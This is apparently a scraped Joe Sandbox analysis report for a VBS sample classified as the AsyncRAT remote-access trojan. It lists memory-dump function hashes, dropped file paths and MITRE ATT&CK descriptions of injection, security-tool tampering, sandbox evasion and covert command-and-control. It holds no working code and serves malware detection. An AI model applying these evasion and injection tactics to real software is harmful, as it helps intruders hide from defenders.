Source File: 00000005.00000002.3468259283.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d60000_AddInProcess32.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: dcfcce38fe4cb47d37d4970d8904f66454d857ed4114fb98864fb04ab3ffe314
Instruction ID: f20c78b71b7d0a9e79a74f36d9f8c1ba120748fe8ca9cdccf00209ef70c7b824
Opcode Fuzzy Hash: dcfcce38fe4cb47d37d4970d8904f66454d857ed4114fb98864fb04ab3ffe314
Instruction Fuzzy Hash: CA2115B19006499FDB10CFAAC884AEEFBF4AF88310F14842EE419A7240C7799944CFA1

Function 00D622D8 Relevance: 1.6, APIs: 1, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 00D6234C

Memory Dump Source

Source File: 00000005.00000002.3468259283.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d60000_AddInProcess32.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 54f71ea4ea86ff28c8a1bb30f3f41b34b5ad17adb52d6b665d4e0b20c57bf511
Instruction ID: 270ef76f396fd1fe0431bff082fe13de578a7bb1fb005abe1c3086929463dc54
Opcode Fuzzy Hash: 54f71ea4ea86ff28c8a1bb30f3f41b34b5ad17adb52d6b665d4e0b20c57bf511
Instruction Fuzzy Hash: B311F7B19007499FDB10DFAAC844BAEFBF4BF48320F148419D519A7250C7799944CFA5

Function 00A7D3B4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3466192790.0000000000A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a7d000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 001b73c213ef599f1943f1d1ef93489eb42182fe33626bb4035e464855bba16f
Instruction ID: 199e843c4b1d2c122e6470c6216454205fad979eeae25ad560fea8a4857a2477
Opcode Fuzzy Hash: 001b73c213ef599f1943f1d1ef93489eb42182fe33626bb4035e464855bba16f
Instruction Fuzzy Hash: 2221FFB2504240EFDB04DF14D9C0B26BF75FF98324F20C5A9E90E0A256C336E856CAA2

Function 00A7D3AF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3466192790.0000000000A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a7d000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
Instruction ID: 28725b8d3a3004d01363380693fd8f59448260aba93f1ef55482f092411dfbae
Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
Instruction Fuzzy Hash: 7111B6B6504284DFCB15CF10D9C4B16BF71FF94324F24C5A9D8494B656C33AE856CBA1

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 1iH5ABLKIA.vbs

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: AsyncRAT

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4c1vj0if.ura.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aautp4qn.m2t.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bwhtzndv.3q1.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m5lhbtdz.hqo.ps1

Static File Info

General

File Icon

Network Behavior

Suricata IDS Alerts

Windows Analysis Report
1iH5ABLKIA.vbs

Function 00D62074 Relevance: 1.6, APIs: 1, Instructions: 78
libraryCOMMON

Function 00D62080 Relevance: 1.6, APIs: 1, Instructions: 71
libraryCOMMON

Function 00D622D1 Relevance: 1.6, APIs: 1, Instructions: 57
memoryCOMMON

Function 00D622D8 Relevance: 1.6, APIs: 1, Instructions: 56
memoryCOMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre